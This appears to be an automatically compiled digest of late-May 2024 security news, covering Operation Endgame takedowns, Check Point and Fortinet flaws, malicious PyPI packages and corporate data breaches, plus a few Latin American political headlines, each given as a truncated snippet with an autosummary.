          Who is elected as Mexico's next president on Sunday will have repercussions on US-Mexico relations. "

          Autosummary: Opinion polls have given the frontrunner, Claudia Sheinbaum, and her main rival, Xóchitl Gálvez, such a large lead over their male rivals, that a female president looks like a foregone conclusion. "


          Police seize over 100 malware loader servers, arrest four cybercriminals

          exploits ciber
          2024-05-30 https://www.bleepingcomputer.com/news/security/police-seize-over-100-malware-loader-servers-arrest-four-cybercriminals/
          An international law enforcement operation codenamed "Operation Endgame" has seized over 100 servers worldwide used by multiple major malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. [...] "

          Autosummary: The operation was supported by intelligence provided by experts from Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD. "


          Deadly end to Mexico campaign as local candidate shot

          latam
          2024-05-30 https://www.bbc.com/news/articles/clee1pq2jdjo
          A man running for mayor in Guerrero state has become the latest victim in a campaign beset by violence "

          Autosummary: Reuters Xóchitl Gálvez is running on an anti-Morena ticket The current president, Andrés Manuel López Obrador, is limited by the constitution to a single six-year term but his Morena party has put forward the former mayor of Mexico City, Claudia Sheinbaum, as its candidate. "


          BBC suffers data breach impacting current, former employees

          financial
          2024-05-30 https://www.bleepingcomputer.com/news/security/bbc-suffers-data-breach-impacting-current-former-employees/
          The BBC has disclosed a data security incident that occurred on May 21, involving unauthorized access to files hosted on a cloud-based service, compromising the personal information of BBC Pension Scheme members. [...] "

          Autosummary: "


          Police seize over 100 malware loader servers, arrest four cybercriminals

          exploits ciber
          2024-05-30 https://www.bleepingcomputer.com/news/security/police-seize-over-100-malware-loader-servers-arrest-four-cybercriminals-operation-endgame/
          An international law enforcement operation codenamed "Operation Endgame" has seized over 100 servers worldwide used by multiple major malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. [...] "

          Autosummary: The operation was supported by intelligence provided by experts from Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD. "


          Researchers Uncover Active Exploitation of WordPress Plugin Vulnerabilities

          exploits
          2024-05-30 https://thehackernews.com/2024/05/researchers-uncover-active-exploitation.html
          Cybersecurity researchers have warned that multiple high-severity security vulnerabilities in WordPress plugins are being actively exploited by threat actors to create rogue administrator accounts for follow-on exploitation. "These vulnerabilities are found in various WordPress plugins and are prone to unauthenticated stored cross-site scripting (XSS) attacks due to inadequate input sanitization "

          Autosummary: "


          Europol Shuts Down 100+ Servers Linked to IcedID, TrickBot, and Other Malware

          exploits
          2024-05-30 https://thehackernews.com/2024/05/europol-dismantles-100-servers-linked.html
          Europol on Thursday said it shut down the infrastructure associated with several malware loader operations such as IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot as part of a coordinated law enforcement effort codenamed Operation Endgame. "The actions focused on disrupting criminal services through arresting High Value Targets, taking down the criminal infrastructures and "

          Autosummary: The agency described the takedowns as the largest-ever operation against botnets, involving authorities from Armenia, Bulgaria, Denmark, France, Germany, Lithuania, the Netherlands, Portugal, Romania, Switzerland, Ukraine, the United Kingdom, and the United States. "


          Cooler Master confirms customer info stolen in data breach

          financial
          2024-05-30 https://www.bleepingcomputer.com/news/security/cooler-master-confirms-customer-info-stolen-in-data-breach/
          Computer hardware manufacturer Cooler Master has confirmed that it suffered a data breach on May 19, allowing a threat actor to steal customer data. [...] "

          Autosummary: Cooler Master's Fanzone site is used to register a product's warranty, request an RMA, or open support tickets, requiring customers to fill in personal data, such as names, email addresses, addresses, phone numbers, birth dates, and physical addresses. "


          Beware of scammers impersonating Malwarebytes

          financial exploits
          2024-05-30 https://www.malwarebytes.com/blog/news/2024/05/beware-of-scammers-impersonating-malwarebytes
          Scammers and other cybercriminals love to use our name to defraud their victims. Here"s what to look out for. "

          Autosummary: Besides some common system information, this stealer goes after: account tokens, Steam tokens, saved card details, system profiles, Telegram logins, a list of running process names, installed browsers and their versions, credentials from the browser “User Data” folder, Local DB and autofill data, cookies from the browser, and a list of folders on the C drive. This is just one scam, but there are always others using our name to target people. "


          CISA Alerts Federal Agencies to Patch Actively Exploited Linux Kernel Flaw

          exploits Linux
          2024-05-30 https://thehackernews.com/2024/05/cisa-alerts-federal-agencies-to-patch.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw impacting the Linux kernel to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2024-1086 (CVSS score: 7.8), the high-severity issue relates to a use-after-free bug in the netfilter component that permits a local attacker to elevate privileges "

          Autosummary: "


          FlyingYeti Exploits WinRAR Vulnerability to Deliver COOKBOX Malware in Ukraine

          exploits
          2024-05-30 https://thehackernews.com/2024/05/flyingyeti-exploits-winrar.html
          Cloudflare on Thursday said it took steps to disrupt a month-long phishing campaign orchestrated by a Russia-aligned threat actor called FlyingYeti targeting Ukraine. "The FlyingYeti campaign capitalized on anxiety over the potential loss of access to housing and utilities by enticing targets to open malicious files via debt-themed lures," Cloudflare's threat intelligence team Cloudforce One "

          Autosummary: "The most prevalent malware families used in these spear-phishing campaigns were Agent Tesla, Remcos, SmokeLoader, Snake Keylogger, and GuLoader." "


          Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors

          industry
          2024-05-30 https://thehackernews.com/2024/05/cyber-espionage-alert-lilacsquid.html
          A previously undocumented cyber espionage-focused threat actor named LilacSquid has been linked to targeted attacks spanning various sectors in the United States (U.S.), Europe, and Asia as part of a data theft campaign since at least 2021. "The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to "

          Autosummary: "


          RedTail Crypto-Mining Malware Exploiting Palo Alto Networks Firewall Vulnerability

          exploits
          2024-05-30 https://thehackernews.com/2024/05/redtail-crypto-mining-malware.html
          The threat actors behind the RedTail cryptocurrency mining malware have added a recently disclosed security flaw impacting Palo Alto Networks firewalls to their exploit arsenal. The addition of the PAN-OS vulnerability to the toolkit has been complemented by updates to the malware, which now incorporates new anti-analysis techniques, according to findings from web infrastructure and security "

          Autosummary: Other propagation mechanisms for RedTail involve the exploitation of known security flaws in TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954). "


          Pirated Microsoft Office delivers malware cocktail on systems

          exploits
          2024-05-30 https://www.bleepingcomputer.com/news/security/pirated-microsoft-office-delivers-malware-cocktail-on-systems/
          Cybercriminals are distributing a malware cocktail through cracked versions of Microsoft Office promoted on torrent sites. [...] "

          Autosummary: According to ASEC, the following types of malware are installed by the malware on the breached system: Orcus RAT: Enables comprehensive remote control, including keylogging, webcam access, screen capture, and system manipulation for data exfiltration. "


          Malware botnet bricked 600,000 routers in mysterious 2023 attack

          exploits
          2024-05-30 https://www.bleepingcomputer.com/news/security/malware-botnet-bricked-600-000-routers-in-mysterious-2023-attack/
          A malware botnet named "Pumpkin Eclipse" performed a mysterious destructive event in 2023 that took 600,000 office/home office (SOHO) internet routers offline, according to a new report by researchers at Lumen's Black Lotus Labs. [...] "

          Autosummary: (Figure: The "Pumpkin Eclipse" infection chain. Source: Black Lotus Labs.) Upon execution, which includes a 30-minute delay to evade sandboxes, the bot collects host-based information such as the MAC address, device ID, device type, device version, and local IP address. The first stage payload is a bash script named "get_scrpc," which executes to fetch a second script called "get_strtriiush," which is responsible for retrieving and executing the primary bot payload, "Chalubo" ("mips.elf"). "


          CISA adds Check Point Quantum Security Gateways and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog

          exploits Linux
          2024-05-30 https://securityaffairs.com/163896/security/cisa-check-point-quantum-security-gateways-linux-kernel-flaws-known-exploited-vulnerabilities-catalog.html
          CISA adds Check Point Quantum Security Gateways and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-24919 is a Quantum Gateway information disclosure issue. Threat actors exploited the flaw to gain remote firewall access […] "

          Autosummary: "


          Avoiding the cybersecurity blame game

          ciber
          2024-05-29 https://www.helpnetsecurity.com/2024/05/29/processes-controls-company-policies/

          Cyber risk management has many components. Those who do it well will conduct comprehensive risk assessments, enact well-documented and well-communicated processes and controls, and fully implement monitoring and review requirements. Processes and controls typically comprise policies, which will include detailed explanations of the acceptable use of company technology. There will usually be examples of the types of activity that are specifically not allowed – such as using someone else’s login credentials or sharing your own. … More

          The post Avoiding the cybersecurity blame game appeared first on Help Net Security.

          "

          Autosummary: Leaving aside that this is a terrible way of expressing the situation – implying, as it does, fault and blame – this number does not correlate well at all with another statistic that suggests 85% of security budgets go to technology, 12% goes to policies, and a miserly 3% goes on people. To make this “stick”, there will almost certainly be training – some on “the basics” and on specific systems, but also other related matters – perhaps the requirements of data protection legislation, for example. If we blame the designers of controls, processes and procedures… well, we are just shifting blame, which is still counterproductive. There will be a policy against using it, for sure – and, yes, there may also be some technical controls. "


          RansomLord: Open-source anti-ransomware exploit tool

          exploits
          2024-05-29 https://www.helpnetsecurity.com/2024/05/29/ransomlord-open-source-anti-ransomware-exploit-tool/

          RansomLord is an open-source tool that automates the creation of PE files, which are used to exploit ransomware pre-encryption. “I created RansomLord to demonstrate ransomware is not invincible, has vulnerabilities and its developers make mistakes and can write bad code just like everyone else,” hyp3rlinx, developer of RansomLord, told Help Net Security. He also outlined the tool’s key features: Leverages DLL hijacking tactics often used by cybercriminals. Deploys exploits in order to defend the network. … More

          The post RansomLord: Open-source anti-ransomware exploit tool appeared first on Help Net Security.

          "

          Autosummary: cryptsp.dll alone defeats fifteen different ransomware: Yanluowang, Conti, LokiLocker, BlueSky, Haron, Thanos, AvosLocker, Meow, BabukLocker, Cerber, Clop, Play, LockerGoga, Jaff, RuRansom. "


          Cybersecurity jobs available right now: May 29, 2024

          ciber
          2024-05-29 https://www.helpnetsecurity.com/2024/05/29/cybersecurity-jobs-available-right-now-may-29-2024/

          Cloud Security Engineer – Secret Clearance Required Constellation West | USA | Remote – View job details As a Cloud Security Engineer, you will establish, execute, and sustain an ISSP A&A capability that ensures the security of all information technology assets, while also ensuring compliance with FISMA. Recognize, assess, and mitigate threats to FSIS’s cloud-based systems, ensuring that security measures are proportional to the threats identified. CSIRT Team Lead CAE | Canada | On-site – … More

          The post Cybersecurity jobs available right now: May 29, 2024 appeared first on Help Net Security.

          "

          Autosummary: Penetration Tester (UK Shift) WTW | Philippines | Hybrid – View job details As a Penetration Tester, you will conduct comprehensive assessments of web applications and infrastructure to identify security vulnerabilities, such as cross-site scripting (XSS), SQL injection, authentication flaws, insecure configurations, poor host device and service configurations, and use these to penetrate deeper into the application/server. Sr. Security Software Engineer, Ai and Data Platforms Apple | USA | On-site – View job details As a Sr. Security Software Engineer, Ai and Data Platforms, you will be responsible for developing security capabilities, services, and tools leveraging both GenAI and traditional security techniques to proactively identify and remediate application security risks earlier in the software development lifecycle. Cyber Analyst, Digital Forensics Incident Response At-Bay | Canada | On-site – View job details As a Cybersecurity Analyst focused on Digital Forensics and Incident Response (DFIR), you will participate in incident recovery activities (e.g., restoration of data from backups, reimaging workstations and servers, rebuilding network infrastructure, etc.) "


          Samsung Electronics union calls first-ever strike

          industry
          2024-05-29 https://www.bbc.com/news/articles/cx7768n6pnpo
          A full-scale strike at the firm could have an impact on the global supply chains of electronics. "

          Autosummary: A union representing thousands of workers at Samsung Electronics has called the first strike at the South Korean technology giant since it was founded five and a half decades ago. "


          PoC exploits for critical FortiSIEM command execution flaws released (CVE-2024-23108, CVE-2023-34992)

          exploits
          2024-05-29 https://www.helpnetsecurity.com/2024/05/29/cve-2024-23108-cve-2023-34992-poc/

          Horizon3.ai researchers have released proof-of-concept (PoC) exploits for CVE-2024-23108 and CVE-2023-34992, vulnerabilities that allow remote, unauthenticated command execution as root on certain Fortinet FortiSIEM appliances. CVE confusion FortiSIEM helps customers build an inventory of their organization’s assets, it aggregates logs and correlates information for threat detection and hunting, and allows automated response and remediation. CVE-2024-23108 and CVE-2024-23109 are OS command injection vulnerabilities in the FortiSIEM supervisor and can be exploited remotely, without authentication, with specially … More

          The post PoC exploits for critical FortiSIEM command execution flaws released (CVE-2024-23108, CVE-2023-34992) appeared first on Help Net Security.

          "

          Autosummary: "


          ABN Amro discloses data breach following an attack on a third-party provider

          financial
          2024-05-29 https://securityaffairs.com/163823/data-breach/abn-amro-discloses-data-breach.html
          Dutch bank ABN Amro discloses a data breach following a ransomware attack that hit the third-party services provider AddComm. Dutch bank ABN Amro disclosed a data breach after third-party services provider AddComm suffered a ransomware attack. AddComm distributes documents and tokens physically and digitally to clients and employees. The ransomware attack occurred last week and unauthorized parties […] "

          Autosummary: Pierluigi Paganini, May 29, 2024. Dutch bank ABN Amro discloses a data breach following a ransomware attack that hit the third-party services provider AddComm. "


          Check Point releases emergency fix for VPN zero-day exploited in attacks

          exploits
          2024-05-29 https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/
          Check Point has released hotfixes for a VPN zero-day vulnerability exploited in attacks to gain remote access to firewalls and attempt to breach corporate networks. [...] "

          Autosummary: Quantum Security Gateway and CloudGuard Network Security: R81.20, R81.10, R81, R80.40; Quantum Maestro and Quantum Scalable Chassis: R81.20, R81.10, R80.40, R80.30SP, R80.20SP; Quantum Spark Gateways: R81.10.x, R80.20.x, R77.20.x. To apply the update, head to the Security Gateway portal > Software Updates > Available Updates > Hotfix Updates, and click "Install." "


          U.S. Sentences 31-Year-Old to 10 Years for Laundering $4.5M in Email Scams

          financial
          2024-05-29 https://thehackernews.com/2024/05/us-sentences-31-year-old-to-10-years.html
          The U.S. Department of Justice (DoJ) has sentenced a 31-year-old man to 10 years in prison for laundering more than $4.5 million through business email compromise (BEC) schemes and romance scams. Malachi Mullings, 31, of Sandy Springs, Georgia pleaded guilty to the money laundering offenses in January 2023. According to court documents, Mullings is said to have opened 20 bank accounts in the "

          Autosummary: "


          Colombian Congress votes to ban bullfighting

          latam
          2024-05-29 https://www.bbc.com/news/articles/cnll5glzl8vo
          After many failed attempts, a bill banning bullfighting has won approval in Colombia's Congress. "

          Autosummary: "


          US dismantles 911 S5 botnet used for cyberattacks, arrests admin

          ciber
          2024-05-29 https://www.bleepingcomputer.com/news/security/us-dismantles-911-s5-residential-proxy-botnet-used-for-cyberattacks-arrests-admin/
          The U.S. Justice Department and international partners dismantled the 911 S5 proxy botnet and arrested 35-year-old Chinese national YunHe Wang, its administrator. [...] "

          Autosummary: (Figure: 911 S5 proxy service prices. Source: BleepingComputer.) According to an indictment unsealed on May 24, dozens of Wang's assets and properties are now subject to forfeiture, "including a 2022 Ferrari F8 Spider S-A, a BMW i8, a BMW X7 M50d, a Rolls Royce, more than a dozen domestic and international bank accounts, over two dozen cryptocurrency wallets, several luxury wristwatches, 21 residential or investment properties (across Thailand, Singapore, the U.A.E., St. Kitts and Nevis, and the United States), and 20 domains. 911 S5 customers also used the illegitimate residential proxy service to submit tens of thousands of fraudulent applications for programs related to the Coronavirus Aid, Relief, and Economic Security (CARES) Act, 560,000 fraudulent unemployment insurance claims, and over 47,000 Economic Injury Disaster Loan (EIDL) applications, resulting in billions of dollars stolen from financial institutions, credit card issuers, and federal lending programs. "


          Going going gone! Ransomware attack grabs Christie’s client data for a steal

          exploits ransomware
          2024-05-29 https://www.bitdefender.com/blog/hotforsecurity/going-going-gone-ransomware-attack-grabs-christies-client-data-for-a-steal/
          The world-renowned auction house Christie's has confirmed that it has fallen victim to a ransomware attack, seemingly orchestrated by a Russia-linked cybercriminal gang. Read more in my article on the Hot for Security blog. "

          Autosummary: "


          Cybercriminals Abuse StackOverflow to Promote Malicious Python Package

          ciber
          2024-05-29 https://thehackernews.com/2024/05/cybercriminals-abuse-stackoverflow-to.html
          Cybersecurity researchers have warned of a new malicious Python package that has been discovered in the Python Package Index (PyPI) repository to facilitate cryptocurrency theft as part of a broader campaign. The package in question is pytoileur, which has been downloaded 316 times as of writing. Interestingly, the package author, who goes by the name PhilipsPY, has uploaded a new version of the "

          Autosummary: "


          Check Point Warns of Zero-Day Attacks on its VPN Gateway Products

          exploits
          2024-05-29 https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html
          Check Point is warning of a zero-day vulnerability in its Network Security gateway products that threat actors have exploited in the wild. Tracked as CVE-2024-24919, the issue impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark appliances. "The vulnerability potentially allows an attacker to read certain information on "

          Autosummary: "


          Brazilian Banks Targeted by New AllaKore RAT Variant Called AllaSenha

          financial latam
          2024-05-29 https://thehackernews.com/2024/05/brazilian-banks-targeted-by-new.html
          Brazilian banking institutions are the target of a new campaign that distributes a custom variant of the Windows-based AllaKore remote access trojan (RAT) called AllaSenha. The malware is "specifically aimed at stealing credentials that are required to access Brazilian bank accounts, [and] leverages Azure cloud as command-and-control (C2) infrastructure," French cybersecurity company HarfangLab "

          Autosummary: A second Python loader script, a ZIP archive containing the PythonMemoryModule package, and another ZIP archive containing "executor.dll." The new Python loader script is then launched to load executor.dll, a Borland Delphi-based malware also called ExecutorLoader, in memory using PythonMemoryModule. Targets of the campaign include banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. "


          Windows 11 KB5037853 update fixes File Explorer issues, 20 bugs

          exploits
          2024-05-29 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5037853-update-fixes-file-explorer-issues-20-bugs/
          Microsoft has released the May 2024 non-security preview update for Windows 11 versions 22H2 and 23H2, which includes 32 fixes and changes. [...] "

          Autosummary: (Figure: Windows 11 KB5037853 preview update. Source: BleepingComputer.) More highlights in the KB5037853 preview update: besides the changes mentioned above, this Windows 11 optional release comes with additional fixes and improvements, some of the more significant ones listed below: This update addresses an issue that affects Bluetooth Low Energy (LE) Audio headsets. "


          Cooler Master hit by data breach exposing customer information

          financial
          2024-05-29 https://www.bleepingcomputer.com/news/security/cooler-master-hit-by-data-breach-exposing-customer-information/
          Computer hardware manufacturer Cooler Master has suffered a data breach after a threat actor breached the company's website and claimed to steal the Fanzone member information of 500,000 customers. [...] "

          Autosummary: "This data breach included cooler master corporate, vendor, sales, warranty, inventory and hr data as well as over 500,000 of their fanzone members personal information, including name, address, date of birth, phone, email + plain unencrypted credit card information containing name, credit card number, expiry and 3 digits cc code," the threat actor told BleepingComputer. "


          Check Point VPN zero-day exploited in attacks since April 30

          exploits
          2024-05-29 https://www.bleepingcomputer.com/news/security/check-point-vpn-zero-day-exploited-in-attacks-since-april-30/
          Threat actors have been exploiting a high-severity Check Point Remote Access VPN zero-day since at least April 30, stealing Active Directory data needed to move laterally through the victims' networks in successful attacks. [...] "

          Autosummary: Threat actors have been observed extracting ntds.dit, a database that stores Active Directory data on users, groups, security descriptors, and password hashes, from compromised customers within 2-3 hours of logging in with a local user. "


          Check Point released hotfix for actively exploited VPN zero-day

          exploits
          2024-05-29 https://securityaffairs.com/163850/digital-id/check-point-vpn-zero-day-hotfix.html
          Check Point released hotfixes for a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively exploited in attacks in the wild. Check Point released hotfixes to address a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively being exploited in attacks in the wild. The vulnerability CVE-2024-24919 is a Quantum Gateway information disclosure issue. Threat actors […]

          Autosummary: Check Point released hotfix for actively exploited VPN zero-day. Pierluigi Paganini, May 29, 2024. Check Point released hotfixes for a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively exploited in attacks in the wild.


          Cybercriminals pose as "helpful" Stack Overflow users to push malware

          exploits ciber
          2024-05-29 https://www.bleepingcomputer.com/news/security/cybercriminals-pose-as-helpful-stack-overflow-users-to-push-malware/
          Cybercriminals are abusing Stack Overflow in an interesting approach to spreading malware—answering users' questions by promoting a malicious PyPi package that installs Windows information-stealing malware. [...]

          Autosummary: "We further noticed that a StackOverflow account "EstAYA G" created roughly 2 days ago is now exploiting the platform's community members seeking debugging help [1, 2, 3] by directing them to install this malicious package as a "solution" to their issue even though the "solution" is unrelated to the questions posted by developers," explained Sharma in the Sonatype report.


          The evolution of security metrics for NIST CSF 2.0

          industry
          2024-05-28 https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/

          CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes. Siloed, narrow metrics do have a place in cybersecurity, …

          The post The evolution of security metrics for NIST CSF 2.0 appeared first on Help Net Security.


          Autosummary: Why CISOs must equal-weight metrics and process. Yet, beneath this veneer of certainty lies a complex truth: individual metrics, while helpful, are fundamentally limited in that they only measure singular data points from siloed systems. Siloed metrics don’t tell the whole story: Narrow metrics may show the number of vulnerabilities patched but don’t capture root causes, how those vulnerabilities were prioritized, or if the most critical ones were addressed first. To understand why process metrics are a necessary complement to traditional siloed metrics, consider the recent attacks by Chinese and Russian hackers that allowed them to access email accounts of top US government officials and top Microsoft brass, respectively. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. More broadly, a narrow reliance on single data points, not metrics, as part of a more extensive process is dangerous for CISOs.


          How to combat alert fatigue in cybersecurity

          ciber
          2024-05-28 https://www.helpnetsecurity.com/2024/05/28/ken-gramley-stamus-networks-alert-fatigue/

          In this Help Net Security interview, Ken Gramley, CEO at Stamus Networks, discusses the primary causes of alert fatigue in cybersecurity and DevOps environments. Alert fatigue results from the overwhelming volume of event data generated by security tools, the prevalence of false positives, and the lack of clear event prioritization and actionable guidance. What are the primary causes of alert fatigue in cybersecurity and DevOps environments? Alert fatigue is the result of several related factors. …

          The post How to combat alert fatigue in cybersecurity appeared first on Help Net Security.


          Autosummary: The three most important components of a modern security operations center (SOC) are the network detection and response (NDR) system, the endpoint detection and response (EDR) system, and the central analytics engine (usually a security information and event management (SIEM) system). I’ve already mentioned the importance of cybersecurity frameworks – these help organizations identify, protect, detect, respond to, and recover from cyberattacks. Lastly, the NDR and EDR must collect all relevant artifacts associated with a given security event, and if possible, correlate and organize them into an incident timeline to accelerate the investigation and allow defenders to eradicate the threat before it’s able to cause any damage. This additional information is proven to help SOC personnel more quickly assess the severity, sources, and causes of an incident, making these alerts much more actionable.


          Cybersecurity teams gear up for tougher challenges in 2024

          ciber
          2024-05-28 https://www.helpnetsecurity.com/2024/05/28/changing-threat-landscape-challenges-video/

          In this Help Net Security video, Tom Gorup, VP of Security Services at Edgio, discusses the continually changing threat landscape. It is riddled with vulnerabilities that are frequently exploited and only intensify as geopolitics and state-sponsored activity increase. Key highlights from the Edgio Q1 2024 Attack Trends Report include: API sprawl – Researchers identified 1.7 million APIs in March alone, creating an uncharted network of ‘shadow’ and ‘zombie’ APIs that operate behind the scenes of many …

          The post Cybersecurity teams gear up for tougher challenges in 2024 appeared first on Help Net Security.



          34% of organizations lack cloud cybersecurity skills

          ciber
          2024-05-28 https://www.helpnetsecurity.com/2024/05/28/cloud-visibility-challenges/

          Incident response today is too time-consuming and manual, leaving organizations vulnerable to damage due to their inability to efficiently investigate and respond to identified threats, according to Cado Security. The incident response challenge is further complicated as enterprises rapidly deploy cloud and container-based technologies and embrace a multi-cloud strategy. The report, which explores the critical role and challenges of incident response, reveals widespread shortcomings that leave organizations vulnerable to delays in resolving incidents and …

          The post 34% of organizations lack cloud cybersecurity skills appeared first on Help Net Security.


          Autosummary: As organizations attempt to lean on existing tools, such as SOAR (Security Orchestration, Automation, and Response) platforms, to gain visibility into cloud-based threats, the report found that incident response automation is twice as effective when compared to SOAR for cloud investigations.


          WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites

          exploits
          2024-05-28 https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html
          Unknown threat actors are abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites that is capable of harvesting credit card data. The campaign, observed by Sucuri on May 11, 2024, entails the abuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. It has over 200 active installations.



          TP-Link Gaming Router Vulnerability Exposes Users to Remote Code Attacks

          exploits
          2024-05-28 https://thehackernews.com/2024/05/tp-link-gaming-router-vulnerability.html
          A maximum-severity security flaw has been disclosed in the TP-Link Archer C5400X gaming router that could lead to remote code execution on susceptible devices by sending specially crafted requests. The vulnerability, tracked as CVE-2024-5035, carries a CVSS score of 10.0. It impacts all versions of the router firmware including and prior to 1_1.1.6. It has



          Microsoft links North Korean hackers to new FakePenny ransomware

          exploits ransomware
          2024-05-28 https://www.bleepingcomputer.com/news/microsoft/microsoft-links-moonstone-sleet-north-korean-hackers-to-new-fakepenny-ransomware/
          Microsoft has linked a North Korean hacking group it tracks as Moonstone Sleet to FakePenny ransomware attacks, which have led to millions of dollars in ransom demands. [...]

          Autosummary: Previously tracked as Storm-17, Moonstone Sleet has been observed attacking both financial and cyberespionage targets using trojanized software (e.g., PuTTY), malicious games and npm packages, custom malware loaders, and fake software development companies (e.g., StarGlow Ventures, C.C. Waterfall) set up to interact with potential victims on LinkedIn, Telegram, freelancing networks, or via email.


          Exploit released for maximum severity Fortinet RCE bug, patch now

          exploits
          2024-05-28 https://www.bleepingcomputer.com/news/security/exploit-released-for-maximum-severity-fortinet-rce-bug-patch-now/
          Security researchers have released a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet's security information and event management (SIEM) solution, which was patched in February. [...]



          First American December data breach impacts 44,000 people

          financial
          2024-05-28 https://www.bleepingcomputer.com/news/security/first-american-december-data-breach-impacts-44-000-people/
          First American Financial Corporation, the second-largest title insurance company in the United States, revealed on Tuesday that a December cyberattack led to a breach impacting 44,000 individuals. [...]



          Russian indicted for selling access to US corporate networks

          rusia-ucrania
          2024-05-28 https://www.bleepingcomputer.com/news/security/russian-indicted-for-selling-access-to-us-corporate-networks/
          A 31-year-old Russian national named Evgeniy Doroshenko has been indicted for wire and computer fraud in the United States for allegedly acting as an "initial access broker" from February 2019 to May 2024. [...]



          Christie disclosed a data breach after a RansomHub attack

          financial
          2024-05-28 https://securityaffairs.com/163808/cyber-crime/christie-data-breach.html
          Auction house Christie disclosed a data breach following a RansomHub cyber attack that occurred this month. Auction house Christie’s disclosed a data breach after the ransomware group RansomHub threatened to leak stolen data. The security breach occurred earlier this month. The website of the auction house was unreachable after the attack. According to BBC, Christie had problems […]

          Autosummary: Christie disclosed a data breach after a RansomHub attack. Pierluigi Paganini, May 28, 2024. Auction house Christie disclosed a data breach following a RansomHub cyber attack that occurred this month.


          Experts released PoC exploit code for RCE in Fortinet SIEM

          exploits
          2024-05-28 https://securityaffairs.com/163797/hacking/fortinet-siem-critical-rce-poc.html
          Researchers released a proof-of-concept (PoC) exploit for remote code execution flaw CVE-2024-23108 in Fortinet SIEM solution. Security researchers at Horizon3’s Attack Team released a proof-of-concept (PoC) exploit for a remote code execution issue, tracked as CVE-2024-23108, in Fortinet’s SIEM solution. The PoC exploit allows executing commands as root on Internet-facing FortiSIEM appliances. In February, cybersecurity […]

          Autosummary: The affected products are:
          FortiSIEM version 7.1.0 through 7.1.1
          FortiSIEM version 7.0.0 through 7.0.2
          FortiSIEM version 6.7.0 through 6.7.8
          FortiSIEM version 6.6.0 through 6.6.3
          FortiSIEM version 6.5.0 through 6.5.2
          FortiSIEM version 6.4.0 through 6.4.2
          The CERT-EU also published an advisory for the above vulnerabilities: “In February 2024, Fortinet quietly updated a 2023 advisory, joining two critical flaws to the list of OS Command vulnerabilities affecting its FortiSIEM product.


          Beyond the buzz: Understanding AI and its role in cybersecurity

          ciber
          2024-05-28 https://www.welivesecurity.com/en/cybersecurity/beyond-buzz-understanding-ai-role-cybersecurity/
          A new white paper from ESET uncovers the risks and opportunities of artificial intelligence for cyber-defenders.

          Autosummary: Since then, it has used AI in various forms to deliver:
          Differentiation between malicious and clean code samples
          Rapid triage, sorting and labelling of malware samples en masse
          A cloud reputation system, leveraging a model of continuous learning via training data
          Endpoint protection with high detection and low false-positive rates, thanks to a combination of neural networks, decision trees and other algorithms
          A powerful cloud sandbox tool powered by multilayered machine learning detection, unpacking and scanning, experimental detection, and deep behavior analysis
          New cloud- and endpoint protection powered by transformer AI models
          XDR that helps prioritize threats by correlating, triaging and grouping large volumes of events
          Why is AI used by security teams? On the other hand, as these capabilities become cheaper and more accessible, threat actors will also utilize the technology in social engineering, disinformation, scams and more. Here are a few examples of current and near-future uses of AI for good: Threat intelligence: LLM-powered GenAI assistants can make the complex simple, analyzing dense technical reports to summarize the key points and actionable takeaways in plain English for analysts. Today, security teams need effective AI-based tools more than ever, thanks to three main drivers: 1.


          Human error still perceived as the Achilles’ heel of cybersecurity

          ciber
          2024-05-27 https://www.helpnetsecurity.com/2024/05/27/cisos-cyber-attacks-defense-confidence/

          While fears of cyber attacks continue to rise, CISOs demonstrate increasing confidence in their ability to defend against these threats, reflecting a significant shift in the cybersecurity landscape, according to Proofpoint. CISOs’ confidence is growing despite fear of cyber attacks: 70% of surveyed CISOs feel at risk of a material cyber attack over the next 12 months, compared to 68% the year before, and 48% in 2022. CISOs today clearly remain on high alert, but …

          The post Human error still perceived as the Achilles’ heel of cybersecurity appeared first on Help Net Security.


